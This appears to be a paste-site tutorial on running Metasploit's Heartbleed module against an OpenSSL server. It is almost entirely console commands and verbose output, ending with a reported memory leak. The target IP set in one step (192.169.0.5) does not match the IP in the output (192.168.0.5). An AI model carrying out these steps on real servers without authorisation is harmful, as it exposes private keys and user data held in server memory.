Exploiting Heartbleed Bug with Metasploit


SUBMITTED BY: sahertian

DATE: June 19, 2016, 9:08 p.m.

FORMAT: Text only

SIZE: 6.1 kB

HITS: 694

  1. An simple tutorial how to exploit Heartbleed OpenSSL Bug using Metasploit
  2. ## Login to your Metasploit Framework
  3. root@kali:~#msfconsole
  4. ## Search the Heartbleed
  5. msf > search heartbleed
  6. Matching Modules
  7. ================
  8. Name Disclosure Date Rank Description
  9. ---- --------------- ---- -----------
  10. auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak
  11. auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
  12. ## Use the Heartbleed Auxiliary and run show options command
  13. msf > use auxiliary/scanner/ssl/openssl_heartbleed
  14. msf auxiliary(openssl_heartbleed) > show options
  15. Module options (auxiliary/scanner/ssl/openssl_heartbleed):
  16. Name Current Setting Required Description
  17. ---- --------------- -------- -----------
  18. DUMPFILTER no Pattern to filter leaked memory before storing
  19. MAX_KEYTRIES 50 yes Max tries to dump key
  20. RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
  21. RHOSTS yes The target address range or CIDR identifier
  22. RPORT 443 yes The target port
  23. STATUS_EVERY 5 yes How many retries until status
  24. THREADS 1 yes The number of concurrent threads
  25. TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
  26. TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
  27. Auxiliary action:
  28. Name Description
  29. ---- -----------
  30. SCAN Check hosts for vulnerability
  31. ## Set the RHOSTS with your target IP
  32. msf auxiliary(openssl_heartbleed) > set RHOSTS 192.169.0.5
  33. RHOSTS => 192.169.0.5
  34. ## Set verbose mode true
  35. msf auxiliary(openssl_heartbleed) > set verbose true
  36. verbose => true
  37. ## Now exploit the target
  38. msf auxiliary(openssl_heartbleed) > exploit
  39. [*] 192.168.0.5:443 - Sending Client Hello...
  40. [*] 192.168.0.5:443 - SSL record #1:
  41. [*] 192.168.0.5:443 - Type: 22
  42. [*] 192.168.0.5:443 - Version: 0x0301
  43. [*] 192.168.0.5:443 - Length: 86
  44. [*] 192.168.0.5:443 - Handshake #1:
  45. [*] 192.168.0.5:443 - Length: 82
  46. [*] 192.168.0.5:443 - Type: Server Hello (2)
  47. [*] 192.168.0.5:443 - Server Hello Version: 0x0301
  48. [*] 192.168.0.5:443 - Server Hello random data: 57670028c2586feab7b89acb206737fb5a3c266668740367834100a7049f80c8
  49. [*] 192.168.0.5:443 - Server Hello Session ID length: 32
  50. [*] 192.168.0.5:443 - Server Hello Session ID: 34fd54aeab97d916e4b3fa0526dad8962efff7b19b22a15a94811d1730a08a94
  51. [*] 192.168.0.5:443 - SSL record #2:
  52. [*] 192.168.0.5:443 - Type: 22
  53. [*] 192.168.0.5:443 - Version: 0x0301
  54. [*] 192.168.0.5:443 - Length: 5329
  55. [*] 192.168.0.5:443 - Handshake #1:
  56. [*] 192.168.0.5:443 - Length: 5325
  57. [*] 192.168.0.5:443 - Type: Certificate Data (11)
  58. [*] 192.168.0.5:443 - Certificates length: 5322
  59. [*] 192.168.0.5:443 - Data length: 5325
  60. [*] 192.168.0.5:443 - Certificate #1:
  61. [*] 192.168.0.5:443 - Certificate #1: Length: 1893
  62. [*] 192.168.0.5:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055eb028>, issuer=#<OpenSSL::X509::Name:0x000000055eb050>, serial=#<OpenSSL::BN:0x000000055eb078>, not_before=2015-10-07 02:26:39 UTC, not_after=2017-10-02 02:36:38 UTC>
  63. [*] 192.168.0.5:443 - Certificate #2:
  64. [*] 192.168.0.5:443 - Certificate #2: Length: 1236
  65. [*] 192.168.0.5:443 - Certificate #2: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055c8898>, issuer=#<OpenSSL::X509::Name:0x000000055c8938>, serial=#<OpenSSL::BN:0x000000055c8a28>, not_before=2011-05-03 07:00:00 UTC, not_after=2031-05-03 07:00:00 UTC>
  66. [*] 192.168.0.5:443 - Certificate #3:
  67. [*] 192.168.0.5:443 - Certificate #3: Length: 1153
  68. [*] 192.168.0.5:443 - Certificate #3: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055a6cc0>, issuer=#<OpenSSL::X509::Name:0x000000055a6ce8>, serial=#<OpenSSL::BN:0x000000055a6d10>, not_before=2014-01-01 07:00:00 UTC, not_after=2031-05-30 07:00:00 UTC>
  69. [*] 192.168.0.5:443 - Certificate #4:
  70. [*] 192.168.0.5:443 - Certificate #4: Length: 1028
  71. [*] 192.168.0.5:443 - Certificate #4: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x00000005589710>, issuer=#<OpenSSL::X509::Name:0x00000005589738>, serial=#<OpenSSL::BN:0x00000005589760>, not_before=2004-06-29 17:06:20 UTC, not_after=2034-06-29 17:06:20 UTC>
  72. [*] 192.168.0.5:443 - SSL record #3:
  73. [*] 192.168.0.5:443 - Type: 22
  74. [*] 192.168.0.5:443 - Version: 0x0301
  75. [*] 192.168.0.5:443 - Length: 331
  76. [*] 192.168.0.5:443 - Handshake #1:
  77. [*] 192.168.0.5:443 - Length: 327
  78. [*] 192.168.0.5:443 - Type: Server Key Exchange (12)
  79. [*] 192.168.0.5:443 - SSL record #4:
  80. [*] 192.168.0.5:443 - Type: 22
  81. [*] 192.168.0.5:443 - Version: 0x0301
  82. [*] 192.168.0.5:443 - Length: 4
  83. [*] 192.168.0.5:443 - Handshake #1:
  84. [*] 192.168.0.5:443 - Length: 0
  85. [*] 192.168.0.5:443 - Type: Server Hello Done (14)
  86. [*] 192.168.0.5:443 - Sending Heartbeat...
  87. [*] 192.168.0.5:443 - Heartbeat response, 65535 bytes
  88. [+] 192.168.0.5:443 - Heartbeat response with leak
  89. Thank you :)

comments powered by Disqus